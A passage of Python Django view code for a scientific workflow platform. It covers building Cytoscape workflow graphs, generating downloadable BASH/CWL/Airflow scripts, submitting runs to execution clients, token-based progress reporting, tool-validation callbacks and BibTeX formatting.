        'workflow_comment_created_at': datetime_to_str(workflow.comment.created_at),
        'workflow_comment_username': workflow.comment.obc_user.user.username,
        'draft': workflow.draft, # Is this a draft workflow?
    }
    return success(ret)
def workflow_node_cytoscape(workflow, name='root', edit=0):
    '''
    Create a cytoscape workflow node
    Normally it should take a database workflow object and create a cytoscape node
    Now it just creates a root workflow cytoscape node
    '''
    assert not workflow # Not yet implemented
    node_data = {
        'belongto': None,
        'edit': edit,
        'id': workflow_id_cytoscape(workflow, name, edit),
        'label': workflow_label_cytoscape(workflow, name, edit),
        'name': name,
        'type': 'workflow',
        'draft': False, # For consistency. It does not realy makes any difference
        'disconnected': False, # For consistency as well.
    }
    return {'data': node_data}
def tool_node_cytoscape(tool, tool_depending_from_me=None):
    '''
    Create a cytoscape tool node
    tool: A database Tool object, or a plain dict describing a tool
    tool_depending_from_me: If i was added as a dependency, this should be the tool that depends from me. FIXME: REMOVE THIS
    Raises:
        TypeError: if tool is neither a Tool instance nor a dict.
        (Previously an unsupported type silently returned None, which only
        surfaced later as a confusing AttributeError/KeyError at the caller.)
    '''
    if isinstance(tool, Tool):
        return {
            'data': {
                'belongto': {'name': 'root', 'edit': 0},
                'dep_id' : tool_id_cytoscape(tool_depending_from_me) if tool_depending_from_me else '#', # Not used in executor
                'edit': tool.edit,
                'id': tool_id_cytoscape(tool),
                'label': tool_label_cytoscape(tool),
                'name': tool.name,
                'root': 'yes' if tool_depending_from_me else 'no', # Not used in executor. 'yes/no' should be True/False for Christ sake! FIXME
                'text': tool_label_cytoscape(tool),
                'type': 'tool',
                'variables': [{'description': variable.description, 'name': variable.name, 'type': 'variable', 'value': variable.value} for variable in tool.variables.all()],
                'installation_commands': tool.installation_commands,
                'validation_commands': tool.validation_commands,
                'os_choices': [choice.os_choices for choice in tool.os_choices.all()],
                'dependencies': [str(t) for t in tool.dependencies.all()],
                'version': tool.version,
                'draft': tool.draft,
            }
        }
    elif isinstance(tool, dict): # isinstance (not type()) so dict subclasses work too
        return {
            'data': {
                'belongto': {'name': 'root', 'edit': 0},
                'dep_id' : tool_id_cytoscape(tool_depending_from_me) if tool_depending_from_me else '#', # See comment above. Not used in executor
                'edit': tool['edit'],
                'id': tool_id_cytoscape(tool),
                'label': tool_label_cytoscape(tool),
                'name': tool['name'],
                'root' : 'yes' if tool_depending_from_me else 'no', # Not used in executor,
                'text': tool_label_cytoscape(tool),
                'type': 'tool',
                'variables': [{'description': variable['description'], 'name': variable['name'], 'type': 'variable', 'value': variable['value']} for variable in tool['variables']],
                'version': tool['version'],
                'draft': tool['draft'],
                'installation_commands': tool['installation_commands'],
                'validation_commands': tool['validation_commands'],
                'os_choices': tool['os_choices'],
                'dependencies': tool['dependencies'],
            }
        }
    # Fail loudly instead of silently returning None
    raise TypeError('tool must be a Tool instance or a dict, got {}'.format(type(tool).__name__))
def step_node_cytoscape(name='main'):
    '''
    Create a cytoscape step node

    name: the step name. Previously this parameter was accepted but ignored
    ('main' was hard-coded everywhere); it is now honored. The default value
    preserves the old behavior for all existing callers.
    '''
    return {
        'data': {
            'bash': '',
            'belongto': {'name': 'root', 'edit': 0},
            'id': step_id_cytoscape(name, None, 'root', None),
            'label': step_id_label(name),
            'inputs': [],
            'outputs': [],
            'steps': [],
            'tools': [],
            'main': True, # NOTE(review): always True, even for non-'main' names — confirm if other names should get main=False
            'name': step_id_label(name),
            'sub_main': False,
            'type': 'step',
        }
    }
def edge_cytoscape(source, target):
    '''
    Create a cytscape edge object connecting two cytoscape nodes.
    source/target: cytoscape node objects (only their data.id is used)
    '''
    source_id = source['data']['id']
    target_id = target['data']['id']
    edge = {
        'data': {
            'source': source_id,
            'target': target_id,
            'id': create_workflow_edge_id(source_id, target_id),
        },
        'position': {
            'x': 0,
            'y': 0,
        },
        'group': 'edges',
        'removed': False,
        'selected': False,
        'selectable': True,
        'locked': False,
        'grabbable': True,
        'classes': '',
    }
    return edge
@has_data
def download_tool(request, **kwargs):
    '''
    Create a cytoscape workflow that installs a given tool.
    Kind of a "fake" workflow that the only thing that it does is install a tool (and its dependencies)
    It is called by download_workflow when the user selects to "download" a tool instead of a workflow

    kwargs: tools_search_name/version/edit describe the tool being downloaded,
    tool_dependencies its first-level dependencies, and the tool_* keys carry
    its commands/variables. Returns the response of download_workflow().
    '''
    workflow = {
        'elements': {
            'nodes': [],
            'edges': [],
        }
    }
    # Add root workflow
    workflow_node = workflow_node_cytoscape(None)
    workflow['elements']['nodes'].append(workflow_node)
    # this does not contain recursively all the dependencies. Only the first level
    root_tool_dependencies = kwargs['tool_dependencies']
    root_tool_objects = [Tool.objects.get(name=t['name'], version=t['version'], edit=t['edit']) for t in root_tool_dependencies]
    all_dependencies_str = list(map(str, root_tool_objects))
    # Add this tool
    tool = {
        'name': str(kwargs['tools_search_name']) if str(kwargs['tools_search_name']) else 'T',
        'version': str(kwargs['tools_search_version']) if str(kwargs['tools_search_version']) else '0',
        'edit': kwargs['tools_search_edit'] if kwargs['tools_search_edit'] else 0, # If this is editable, then the edit is 0
        'variables': [variable for variable in kwargs['tool_variables'] if variable['name'] and variable['value'] and variable['description']],
        'draft': kwargs['tool_draft'],
        'installation_commands': kwargs['tool_installation_commands'],
        'validation_commands': kwargs['tool_validation_commands'],
        'os_choices': kwargs['tool_os_choices'],
        'dependencies': all_dependencies_str,
    }
    this_tool_cytoscape_node = tool_node_cytoscape(tool)
    workflow['elements']['nodes'].append(this_tool_cytoscape_node)
    # Add an edge between the root workflow and this tool
    workflow['elements']['edges'].append(edge_cytoscape(workflow_node, this_tool_cytoscape_node))
    # Build tool nodes for all dependencies (recursively). An id should exist
    # only once in the graph, so track the ids already present.
    # (Fixes the old FIXME: the dedup set was never populated, so tools shared
    # by several dependencies were added to the graph multiple times.)
    seen_node_ids = {node['data']['id'] for node in workflow['elements']['nodes']}
    seen_edge_ids = {edge['data']['id'] for edge in workflow['elements']['edges']}
    for root_tool_obj in root_tool_objects:
        # Get all dependencies recursively for this first-level dependency
        # (include_as_root=True makes the list include root_tool_obj itself)
        root_tool_all_dependencies = tool_get_dependencies_internal(root_tool_obj, include_as_root=True)
        for root_tool_all_dependency in root_tool_all_dependencies:
            # For each dependency create a cytoscape node
            cytoscape_node = tool_node_cytoscape(root_tool_all_dependency['dependency'])
            if cytoscape_node['data']['id'] not in seen_node_ids:
                seen_node_ids.add(cytoscape_node['data']['id'])
                workflow['elements']['nodes'].append(cytoscape_node)
            # Connect this tool with its dependent tool node
            if root_tool_all_dependency['dependant']:
                edge = edge_cytoscape(cytoscape_node, tool_node_cytoscape(root_tool_all_dependency['dependant']))
            else:
                # This is a dependency of the root tool!
                edge = edge_cytoscape(cytoscape_node, this_tool_cytoscape_node)
            # Avoid duplicated edge ids as well (shared dependencies would
            # otherwise produce the exact same edge twice)
            if edge['data']['id'] not in seen_edge_ids:
                seen_edge_ids.add(edge['data']['id'])
                workflow['elements']['edges'].append(edge)
    # Create a step node
    step_node = step_node_cytoscape('main')
    workflow['elements']['nodes'].append(step_node)
    # Connect it with the root workflow
    workflow['elements']['edges'].append(edge_cytoscape(workflow_node, step_node))
    return download_workflow(request, **{
        'workflow_options': {},
        'workflow': None,
        'download_type': kwargs.get('download_type', 'BASH'),
        'workflow_cy': workflow,
        'workflow_info_editable': False,
    })
@has_data
def download_workflow(request, **kwargs):
    '''
    Defined in urls.py:
    path('download_workflow/', views.download_workflow), # Accepts a workflow_options and workflow object. Runs a workflow
    https://docs.djangoproject.com/en/2.2/ref/request-response/#telling-the-browser-to-treat-the-response-as-a-file-attachment
    kwargs['workflow'] = {'name': <workflow_name>, 'edit': <workflow_edit>}
    kwargs['workflow_cy'] is the cytoscape workflow
    Note: Everyone can download a workflow!

    Produces a downloadable artifact (JSON / BASH / CWL tar.gz / CWL zip / AIRFLOW)
    for one of three sources: an unsaved (editable) workflow, a saved workflow,
    or a synthetic tool-installation workflow built by download_tool.
    For saved, non-draft workflows of validated users a Report is also created.
    '''
    workflow_arg = kwargs['workflow']
    workflow_options_arg = kwargs['workflow_options']
    download_type = kwargs['download_type'] # For a full list of types see below . if download_type == ...
    workflow_info_editable = kwargs['workflow_info_editable'] # IS this workflow saved or not ? . TRUE: NOT SAVED
    workflow_id = kwargs.get('workflow_id')
    workflow_obc_client = kwargs.get('obc_client', False)

    if workflow_info_editable:
        # This workflow has not been saved!
        workflow = kwargs.get('workflow_json', '')
        workflow_name = workflow_arg.get('name', '')
        if not workflow_name:
            # Unsaved workflows may be nameless; fall back to a default name
            workflow_name = 'W'
        workflow_edit = 0
        set_edit_to_cytoscape_json(workflow, workflow_edit, workflow_name)
        # Exactly one step must be declared as "main" for the workflow to be runnable
        main_counter = check_workflow_step_main(workflow, {'name':workflow_name, 'edit': workflow_edit})
        if main_counter == 0:
            return fail('Could not find main step. One step needs to be declared as "main"')
        if main_counter > 1:
            return fail('Error 49188') # This should never happen
        workflow_cy = workflow
        workflow = None
    elif workflow_arg:
        # This is a workflow saved
        workflow = Workflow.objects.get(**workflow_arg)
        workflow_cy = simplejson.loads(workflow.workflow)
    else:
        # This is a tool (called from download_tool with a synthetic cytoscape graph)
        workflow = None
        workflow_cy = kwargs['workflow_cy']

    # Create a new Report object
    if (not user_is_validated(request)) or (not workflow) or (workflow.draft):
        '''
        If :
        user is anonymous or
        with non-validated email or
        not saved workflow or
        this is a tool run (workflow is None) or
        workflow is draft
        then:
        we do not create a report!
        '''
        run_report = None
        nice_id = None
        token = None
        report_created = False # Do we create a report upon execution of this workflow?
    else:
        run_report = Report(
            obc_user = OBC_user.objects.get(user=request.user),
            workflow = workflow,
        )
        # Attach a new report_id to it
        run_report.save()
        nice_id = str(run_report.nice_id)
        # Seed the report with an UNUSED token; the executor will rotate tokens
        # as it reports back progress (see the report() view)
        report_token = ReportToken(status=ReportToken.UNUSED, active=True)
        report_token.save()
        run_report.tokens.add(report_token)
        run_report.save()
        token = str(report_token.token)
        report_created = True

    # This is the payload embedded in the generated artifact
    output_object = {
        'arguments': workflow_options_arg,
        'workflow': workflow_cy,
        'token': token,
        'nice_id': nice_id,
    }

    ret = {}
    server_url = get_server_url(request)
    try:
        # URL-quote the generated artifact so it travels safely inside the JSON response
        if download_type == 'JSON':
            output_object = urllib.parse.quote(simplejson.dumps(output_object))
            ret['output_object'] = output_object
        elif download_type == 'BASH':
            output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'sh'))
            ret['output_object'] = output_object
        elif download_type == 'CWLTARGZ':
            output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'cwltargz'))
            ret['output_object'] = output_object
        elif download_type == 'CWLZIP':
            output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'cwlzip',))
            ret['output_object'] = output_object
        elif download_type == 'AIRFLOW':
            output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'airflow', workflow_id=workflow_id, obc_client=workflow_obc_client))
            ret['output_object'] = output_object
    except OBC_Executor_Exception as e:
        return fail(str(e))

    ret['report_created'] = report_created
    ret['nice_id'] = nice_id

    return success(ret)
def callback_url(request):
    '''
    Build the callback URL that execution clients use to report back to the platform.
    '''
    scheme = request.scheme
    host = request.META["HTTP_HOST"]
    return '{}://{}/platform/'.format(scheme, host)
@has_data
def run_workflow(request, **kwargs):
    '''
    path('run_workflow/', view.run_workflow)
    curl -H "Content-Type: application/json" --request POST --data '{"type":"workflow","name":"test", "edit": "2"}' "http://139.91.81.103:5000/3ee5ccfb744983968fb3e9735e4bb85d/run_workflow"
    source: Where the request came from. If it from rest then source='frontend'

    Submit a saved workflow for execution on one of the user's registered
    execution clients and create a Report (status SUBMITTED) to track the run.
    Requires a logged-in, email-validated user.
    '''
    if request.user.is_anonymous: # Server should always check..
        return fail('Error 3291. User is anonymous')
    if not user_is_validated(request):
        return fail('Error 3292. User is not validated ' + validate_toast_button());

    obc_user = OBC_user.objects.get(user=request.user)

    profile_name = kwargs.get('profile_name', '')
    if not str(profile_name):
        return fail('Error 3288. Invalid profile name')

    name = kwargs.get('name', '')
    if not str(name):
        return fail('Error 3289. Invalid workflow name')

    edit = kwargs.get('edit', '')
    try:
        edit = int(edit)
    except ValueError as e:
        return fail('Error 3290. Invalid workflow edit')

    # Get the client (execution profile) registered by this user
    try:
        client = obc_user.clients.get(name=profile_name)
    except ObjectDoesNotExist as e:
        return fail('Error 3293. Could not get execution client.')

    # Get the workflow
    try:
        workflow = Workflow.objects.get(name=name, edit=edit)
    except ObjectDoesNotExist as e:
        return fail('Error 3294. Could not get Workflow object.')

    url = client.client
    # https://stackoverflow.com/questions/8223939/how-to-join-absolute-and-relative-urls
    run_url = urllib.parse.urljoin(url + '/', 'run')

    # A fresh id identifies this run both locally and on the client
    nice_id = create_nice_id()
    data_to_submit = {
        'type': 'workflow',
        'name': name,
        'edit': edit,
        'callback': callback_url(request),
        'workflow_id': nice_id,
    }
    headers={ "Content-Type" : "application/json", "Accept" : "application/json"}
    '''
    '''
    '''
    curl --header "Content-Type: application/json" \
    --request GET \
    http://139.91.190.239:5000/cfa52d9df5a24345d9f740395e4e69e4/check/id/test
    [{"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A16%3A42%2B00%3A00", "execution_date": "2020-02-28T13:16:42+00:00", "id": 2, "run_id": "manual__2020-02-28T13:16:42+00:00", "start_date": "2020-02-28T13:16:42.710933+00:00", "state": "success"}, {"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A20%3A44%2B00%3A00", "execution_date": "2020-02-28T13:20:44+00:00", "id": 3, "run_id": "manual__2020-02-28T13:20:44+00:00", "start_date": "2020-02-28T13:20:44.423814+00:00", "state": "success"}, {"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A24%3A02%2B00%3A00", "execution_date": "2020-02-28T13:24:02+00:00", "id": 4, "run_id": "manual__2020-02-28T13:24:02+00:00", "start_date": "2020-02-28T13:24:02.486982+00:00", "state": "success"}]
    '''

    # !!!HIGLY EXPERIMENTAL!!!
    # Submit the run request to the execution client
    try:
        r = requests.post(run_url, headers=headers, data=simplejson.dumps(data_to_submit))
    except requests.exceptions.ConnectionError as e:
        return fail('Could not establish a connection with client')

    if not r.ok:
        return fail('Could not send to URL: {} . Error code: {}'.format(run_url, r.status_code))

    try:
        data_from_client = r.json()
    except Exception as e: # Ideally we should do here: except json.decoder.JSONDecodeError as e: but we would have to import json with simp[lejson..]
        return fail('Could not parse JSON data from Execution Client.')

    # Check data_from_client. We expect to find an externally triggered True in data_from_client['status']['message']
    if not 'status' in data_from_client:
        return fail('Client does not contains status info')
    if not 'message' in data_from_client['status']:
        return fail("Client's status does not contain any message")
    if not 'externally triggered: True' in data_from_client['status']['message']:
        return fail("Client failed to trigger DAG: {}".format(data_from_client['status']['message']))
    if not 'executor_url' in data_from_client:
        return fail("Could not get workflow monitoring URL..")

    # URL on which the user can visualize the execution on the client
    visualization_url = g['create_client_airflow_url'](data_from_client['executor_url'], nice_id)

    if not 'monitor_url' in data_from_client:
        return fail('Could not get monitoring URL..')
    monitor_url = data_from_client['monitor_url']

    # All seem to be ok. Create a report
    report = Report(
        obc_user=obc_user,
        workflow = workflow,
        nice_id = nice_id,
        client=client,
        visualization_url=visualization_url,
        monitor_url = monitor_url,
        client_status='SUBMITTED')
    report.save()

    # Let's not create a reporttoken for now.
    ret = {
        'nice_id': nice_id,
    }
    return success(ret)
@csrf_exempt
@has_data
def report(request, **kwargs):
    '''
    Called from the executor to report workflow-execution progress.
    Each call consumes (deactivates) the supplied single-use token, stores the
    new status on the report, and answers with a fresh token for the next update.
    '''
    token = kwargs.get('token', None)
    if not token:
        return fail('Could not find token field')
    if not uuid_is_valid(token):
        return fail('bad token format')

    status_received = kwargs.get('status', None)
    if not status_received:
        return fail('Could not find status field')

    # Validate the received status string
    status_fields = ReportToken.parse_response_status(status_received)
    if status_fields is None:
        return fail('Unknown status: {}'.format(status_received))

    # Get the ReportToken
    try:
        old_report_token = ReportToken.objects.get(token=token)
    except ObjectDoesNotExist as e:
        return fail('Could not find entry to this token')
    if not old_report_token.active:
        return fail('This token has expired')

    # Deactivate it — tokens are single-use
    old_report_token.active = False
    old_report_token.save()

    # Get the report this token belongs to
    report_obj = old_report_token.report_related.first()

    # Save the new status and return a new token
    new_report_token = ReportToken(status=status_received, active=True) # Duplicate code
    new_report_token.save()
    report_obj.tokens.add(new_report_token)
    report_obj.save()

    return success({'token': str(new_report_token.token)})
### END OF WORKFLOWS ###
### START OF VALIDATION CALLBACK ###
@has_data
def tool_validation_status(request, **kwargs):
    '''
    Called from the refresh button on Tool validation.
    Returns the status, timestamp and captured outputs of the tool's last
    validation attempt, or 'Unvalidated' if none exists.
    '''
    tool = Tool.objects.get(**kwargs['tool'])

    last = tool.last_validation
    if last:
        ret = {
            'validation_status': last.validation_status,
            'validation_created_at': datetime_to_str(last.created_at),
            'stderr': last.stderr,
            'stdout': last.stdout,
            'errcode': last.errcode,
        }
    else:
        ret = {
            'validation_status': 'Unvalidated',
            'validation_created_at': None,
            'stderr': None,
            'stdout': None,
            'errcode': None,
        }

    return success(ret)
@has_data
def tool_info_validation_queued(request, **kwargs):
    '''
    This is called from angular in order to connect the controller id with the database tool.
    Creates a ToolValidations entry in 'Queued' state and points the tool's
    last_validation at it.
    '''
    if not 'payload' in kwargs:
        return fail('payload was not found on callback')
    payload = kwargs['payload']

    # Explicit validation instead of `assert` (asserts are stripped under `python -O`,
    # which would let arbitrary statuses through silently).
    if payload.get('status') != 'Queued':
        return fail('Unexpected status: {}'.format(payload.get('status')))

    tool = Tool.objects.get(**payload['tool'])
    this_id = payload['id']

    tv = ToolValidations(tool=tool, task_id=this_id, validation_status='Queued')
    tv.save()

    tool.last_validation = tv
    tool.save()

    return success({'last_validation': datetime_to_str(tv.created_at)})
@csrf_exempt
@has_data
def callback(request, **kwargs):
    '''
    Function called by controller.py after a tool-validation task changes state.
    Stores the reported status (plus stdout/stderr/errcode, if any) as a new
    ToolValidations entry and marks it as the tool's last validation.
    '''
    remote_address = request.META['REMOTE_ADDR']
    # NOTE(review): callbacks are accepted only from this single hard-coded
    # controller IP — consider moving it to settings/configuration.
    if not remote_address in ['139.91.190.79']:
        return fail(f'Received callback from unknown remote address: {remote_address}')

    if not 'payload' in kwargs:
        return fail('payload was not found on callback')
    payload = kwargs['payload']

    if not 'status' in payload:
        return fail('status was not found on payload')
    status = payload['status']
    if not status in ['Running', 'Validated', 'Failed']:
        return fail(f'Unknown status: {status}')

    if not 'id' in payload:
        return fail('id was not found on payload')
    this_id = payload['id']

    # Get the stdout, stderr and error code (optional; may be absent)
    stdout = payload.get('stdout', None)
    stderr = payload.get('stderr', None)
    errcode = payload.get('errcode', None)

    # Get the tool referring to this task_id
    tool = ToolValidations.get_tool_from_task_id(this_id)
    if tool is None:
        return fail(f'Could not find tool with task_id={this_id}')

    # Create new ToolValidations
    # If stdout is empty, stderr and errcode are empty
    # If status is Queued or Running these three are None
    tv = ToolValidations(tool=tool, task_id=this_id, validation_status=status, stdout= stdout, stderr= stderr, errcode= errcode)
    tv.save()

    # Assign tv to tool
    tool.last_validation = tv
    tool.save()

    return success()
def tools_show_stdout(request, tools_info_name, tools_info_version, tools_info_edit):
    '''
    URL :
    path(r'tool_stdout/[\\w]+/[\\w\\.]+/[\\d]+/', views.tools_show_stdout), # Show stdout of tool

    Render the stdout of the tool's last validation attempt as an HTML page
    (ANSI escape codes converted to HTML).
    '''
    tool_repr = Tool.get_repr(tools_info_name, tools_info_version, tools_info_edit)
    try:
        tool = Tool.objects.get(name=tools_info_name, version=tools_info_version, edit=int(tools_info_edit))
    except ObjectDoesNotExist as e:
        return fail(f'Could not find tool: {tool_repr}')

    if not tool.last_validation:
        return fail(f'Could not find any validation effort for tool: {tool_repr}')

    if not tool.last_validation.stdout:
        # Fixed typos in the user-facing message ("Coud"/"lst"/"efoort")
        return fail(f'Could not find stdout on the last validation effort of tool: {tool_repr}')

    context = {
        'html': convert_ansi_to_html(tool.last_validation.stdout)
    }
    return render(request, 'app/tool_stdout.html', context)
### END OF CALL BACK ###
### REPORTS
def reports_search_2(main_search, request):
    '''
    Collect all reports from main search.
    In contrary to other *_search_2 , we only allow to show reports that belong to the login user!
    Returns the number of matching reports plus a jstree structure in which
    reports are grouped under their workflow (workflows nested by fork lineage).
    '''
    # Return empty results if user is anonymous or not validated
    if request.user.is_anonymous or (not user_is_validated(request)):
        return {
            'main_search_reports_number': 0,
            'reports_search_jstree': [],
        }

    obc_user = OBC_user.objects.get(user=request.user)

    # Match the search term against the run id, the workflow name or the owner's username
    nice_id_Q = Q(nice_id__contains=main_search)
    username_Q = Q(obc_user__user__username__icontains=main_search)
    workflow_Q = Q(workflow__name__icontains=main_search)
    not_unused = Q(tokens__status = ReportToken.UNUSED)
    count_1 = Q(num_tokens = 1)
    user_Q = Q(obc_user = obc_user)

    # We do not want reports that have only one token which is "unused"
    # (i.e. reports whose execution never reported any progress)
    results = Report.objects.annotate(num_tokens=Count('tokens')).filter(
        user_Q & (nice_id_Q | workflow_Q | username_Q) & (~(not_unused&count_1))
    )

    # BUILD TREE
    reports_search_jstree = []
    workflows_in_tree = set()
    for report in results:
        # Add the workflow node (only once per workflow)
        workflow = report.workflow
        if not workflow in workflows_in_tree:
            workflows_in_tree.add(workflow)
            to_add = {
                'data': {'name': workflow.name, 'edit': workflow.edit, 'type': 'workflow'},
                'text': workflow_text_jstree(workflow) + jstree_icon_html('workflows'),
                'id': workflow_id_jstree(workflow, g['SEARCH_REPORT_TREE_ID']),
                # Nest forked workflows under the workflow they were forked from
                'parent': workflow_id_jstree(workflow.forked_from, g['SEARCH_REPORT_TREE_ID']) if workflow.forked_from else '#',
                'state': { 'opened': True},
            }
            reports_search_jstree.append(to_add)

        # Add the report node under its workflow
        to_add = {
            'data': {'run': report.nice_id, 'type': 'report'},
            'text': report.nice_id + jstree_icon_html('reports'),
            'id': report_id_jstree(report, g['SEARCH_REPORT_TREE_ID']),
            'parent': workflow_id_jstree(workflow, g['SEARCH_REPORT_TREE_ID']),
            'state': { 'opened': True},
        }
        reports_search_jstree.append(to_add)

    ret = {
        'main_search_reports_number': results.count(),
        'reports_search_jstree': reports_search_jstree,
    }
    return ret
@has_data
def reports_search_3(request, **kwargs):
    '''
    Search for an individual report (by run nice_id).
    Returns the report's metadata, its ordered status tokens and the
    workflow graph. Only the owner of the report has access.
    '''
    if request.user.is_anonymous or (not user_is_validated(request)):
        return fail('You are either anonymous or your email is not validated. You do not have access to reports.')

    obc_user = OBC_user.objects.get(user=request.user)
    run = kwargs['run']
    try:
        # Filtering on obc_user enforces ownership
        report = Report.objects.get(nice_id=run, obc_user=obc_user)
    except ObjectDoesNotExist as e:
        return fail('Could not find report, or you do not have access.')

    workflow = report.workflow

    # Get all tokens (oldest first), skipping the initial UNUSED placeholder
    tokens = [{
        'status': token.status,
        'created_at': datetime_to_str(token.created_at),
        'token': str(token.token),
        'node_anim_params': ReportToken.parse_response_status(token.status), # the parameter passed to nodeAnimation_public
    } for token in report.tokens.all().order_by('created_at') if token.status != ReportToken.UNUSED]

    # Check if ReportToken.parse_response_status successfully parsed tokens
    # This is a sanity check
    for token in tokens:
        if token['node_anim_params'] is None:
            return fail('Error 8915: could not parse token: {}'.format(token['status']))

    ret = {
        'report_workflow_name': workflow.name,
        'report_workflow_edit': workflow.edit,
        'report_username': report.obc_user.user.username,
        'report_created_at': datetime_to_str(report.created_at),
        'report_tokens': tokens,
        'report_client': bool(report.client),
        'report_url': report.url, # The url with the results
        'report_log_url': report.log_url, # The url with the logs
        'report_visualization_url': report.visualization_url, # The url for monitoring of the execution progress (i.e. from airflow)
        'report_monitor_url': report.monitor_url,
        'report_client_status': report.client_status,
        'workflow' : simplejson.loads(workflow.workflow),
    }
    return success(ret)
@has_data
def reports_refresh(request, **kwargs):
    '''
    path: report_refresh/
    Get an update for a report by contacting its execution client.
    report_workflow_action : 1 = refresh , 2 = pause , 3 = resume , 4 = delete/abort
    Only the owner of the report may act on it.
    '''
    # Name/edit are currently unused here but are part of the request contract;
    # int() also validates the edit value.
    report_workflow_name = kwargs['report_workflow_name']
    report_workflow_edit = int(kwargs['report_workflow_edit'])
    nice_id = kwargs['report_workflow_run']
    report_workflow_action = kwargs['report_workflow_action']

    # Get the report
    report = Report.objects.get(nice_id=nice_id)

    if request.user.is_anonymous:
        return fail('Please log in to update the status of a Report')

    # Get this user and make sure the report is theirs
    obc_user = OBC_user.objects.get(user=request.user)
    if obc_user != report.obc_user:
        return fail('Cannot edit a report of another user.')

    if not report.client:
        if report_workflow_action == 4:
            # Deleting a report that has not been associated with any client.
            # Just delete it..
            report.delete()
            return success()

    # Get the url of the client
    client_url = report.client.client

    if report_workflow_action == 1:
        # Refresh: get the url to check status
        url = g['create_client_check_status_url'](client_url, nice_id)
    elif report_workflow_action == 2:
        # Pause
        url = g['create_client_pause_url'](client_url, nice_id)
    elif report_workflow_action == 3:
        # Resume
        url = g['create_client_resume_url'](client_url, nice_id)
    elif report_workflow_action == 4:
        # Delete / abort
        url = g['create_client_abort_url'](client_url, nice_id)
    else:
        return fail('Error 5821: {}'.format(str(report_workflow_action)))

    try:
        r = requests.get(url)
    except requests.exceptions.ConnectionError as e:
        return fail('Could not establish a connection with client')

    if not r.ok:
        return fail('Could not send to URL: {} . Error code: {}'.format(client_url, r.status_code))

    data_from_client = r.json()

    if report_workflow_action == 1: # refresh
        if type(data_from_client) is dict:
            # On error the client answers with a dict, e.g. {"error": "Dag id mitsos not found"}
            if 'error' in data_from_client:
                if 'not found' in data_from_client['error']:
                    status = 'NOT FOUND'
                else:
                    return fail('Error: 1111')
            else:
                return fail('Error: 1112')
        else:
            # BUGFIX: these list checks used to run even after the dict branch above
            # had set status = 'NOT FOUND', so that path always failed with Error 1113.
            if not type(data_from_client) is list:
                return fail('Error: 1113')
            if len(data_from_client) != 1:
                return fail('Error: 1114')
            if not type(data_from_client[0]) is dict:
                return fail('Error: 1115')
            if not 'state' in data_from_client[0]:
                return fail('Error: 1116')

            if data_from_client[0]['state'] == 'running':
                status = 'RUNNING'
            elif data_from_client[0]['state'] == 'failed':
                status = 'FAILED'
            elif data_from_client[0]['state'] == 'success':
                status = 'SUCCESS'
            elif data_from_client[0]['state'] == 'paused':
                status = 'PAUSED'
            else:
                # BUGFIX: fail() was called with two positional arguments here;
                # format the message into a single string like every other call site.
                return fail('Unknown status: {}'.format(data_from_client[0]['state']))
    elif report_workflow_action in [2, 3]: # 2 = pause , 3 = resume
        if not type(data_from_client) is dict:
            return fail('Error: 1119')
        if not 'response' in data_from_client:
            return fail('Error: 1120')
        if data_from_client['response'] != 'ok':
            return fail('Error 1121')
        if report_workflow_action == 2:
            status = 'PAUSE_SUBMITTED'
        elif report_workflow_action == 3:
            status = 'RESUME_SUBMITTED'
        else:
            return fail('Error 1122')
    elif report_workflow_action == 4:
        if not type(data_from_client) is dict:
            return fail('Error: 1123')
        if not 'status' in data_from_client:
            return fail('Error 1124')
        if data_from_client['status'] != 'success':
            return fail('Client responded with an error message: {}'.format(data_from_client['status']))
        # Delete it..
        report.delete()
        return success()

    # Update report object
    report.client_status = status
    report.save()

    # If we finished, then create the URL that contains the report
    report_url = None
    log_url = None
    if status == 'SUCCESS':
        report_url = g['create_client_download_report_url'](client_url, nice_id)
    if status in ['SUCCESS', 'FAILED']:
        log_url = g['create_client_download_log_url'](client_url, nice_id)

    report.url = report_url
    report.log_url = log_url
    report.save()

    ret = {
        'report_url': report_url,
        'report_log_url': log_url,
        'report_client_status': status,
    }
    return success(ret)
### END OF REPORTS
### REFERENCES
def bibtex_to_html(content):
    '''
    Convert bibtex to html
    Adapted from: http://pybtex-docutils.readthedocs.io/en/latest/quickstart.html#overview

    Returns a (success, payload, fields) triple:
      * (True, html_fragment, fields_dict) on success
      * (False, error_message, None) on failure
    Exactly one bibtex entry is required.
    '''
    # Ideally we could have these variables set only once,
    # But it is not allowed to have multiple entries.
    pybtex_style = pybtex.plugin.find_plugin('pybtex.style.formatting', 'plain')()
    pybtex_html_backend = pybtex.plugin.find_plugin('pybtex.backends', 'html')()
    pybtex_parser = pybtex.database.input.bibtex.Parser()

    try:
        data = pybtex_parser.parse_stream(six.StringIO(content))
    except pybtex.scanner.TokenRequired as e:
        return False, 'Error during parsing BIBTEX: ' + str(e), None

    if len(data.entries) == 0:
        return False, 'Could not find any BIBTEX entry', None
    if len(data.entries) > 1:
        return False, 'Detected more than one entries in BIBTEX. Only one is allowed', None

    # Collect the raw key/value pairs of the (single) entry:
    # fields[entry_key][field_key] = field_value
    fields = {}
    for entry_key, entry_value in data.entries.items():
        fields[entry_key] = {}
        for field_key, field_value in entry_value.fields.items():
            fields[entry_key][field_key] = field_value

    data_formatted = pybtex_style.format_entries(six.itervalues(data.entries))
    output = io.StringIO()
    try:
        pybtex_html_backend.write_to_stream(data_formatted, output)
    except pybtex.style.template.FieldIsMissing as e:
        return False, str(e), None # This DOI for example: 10.1038/nature09298 . Error: missing author in 2010.

    html = output.getvalue()
    # Strip the surrounding HTML-document boilerplate that pybtex emits, keeping
    # only the formatted entry. NOTE(review): the [9:-2] offsets depend on the
    # exact layout of pybtex's HTML backend output — fragile across pybtex versions.
    html_s = html.split('\n')
    html_s = html_s[9:-2]
    new_html = '\n'.join(html_s).replace('<dd>', '').replace('</dd>', '')

    return True, new_html, fields
def get_fields_from_bibtex_fields(fields, str_response):
    '''
    Extract name / title / doi / url from parsed bibtex fields.

    fields maps entry-key -> {bibtex field -> value} (as produced by
    bibtex_to_html); str_response is the already-formatted HTML fragment.
    Curly braces (bibtex capitalization protection) are stripped from the title,
